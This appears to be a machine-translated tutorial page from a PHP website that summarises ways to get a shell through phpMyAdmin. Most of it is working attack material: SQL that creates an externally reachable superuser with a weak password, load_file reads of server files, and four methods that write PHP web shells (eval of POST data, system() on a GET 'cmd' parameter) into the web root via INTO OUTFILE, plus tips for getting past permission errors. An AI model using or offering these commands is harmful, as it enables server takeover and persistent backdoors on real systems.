Home >Database >phpMyAdmin >Summary PHPmyadmin takes shell
The following is a summary for everyone in the phpmyadmin usage tutorial columnphpmyadminGet the shell, I hope it will be helpful to friends in need!
PHPmyadmin takes shell summary
PHPmyadmin changes user password
Click directly on localhost or 1270.0.1 above, the user column will appear, click to modify
Add the super user guesssec password ooxx and allow external connections
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
We can create a root account and set a password
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
In this way, a root external link account is created, the password is 123456, use 123456 for external links
Four classic methods of using shell:
Method one:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
Method two:
读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Method three:
JhackJ version PHPmyadmin takes shell
Create TABLE study (cmd text NOT NULL); Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>'); select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数: 1 SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
Method 4:
select load_file('E:/xamp/www/study.php'); select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Then visit the website directory: http://www.2cto.com/study.php?cmd=dir
Phpmyadmin appears when exporting a sentence (Errcode: 13 - Permission denied)
There is no permission for this directory. You can try the upper-level directory or the lower-level directory
If that doesn’t work, try NTS traffic
Also, pay attention to the directory\
The above is the detailed content of Summary PHPmyadmin takes shell. For more information, please follow other related articles on the PHP Chinese website!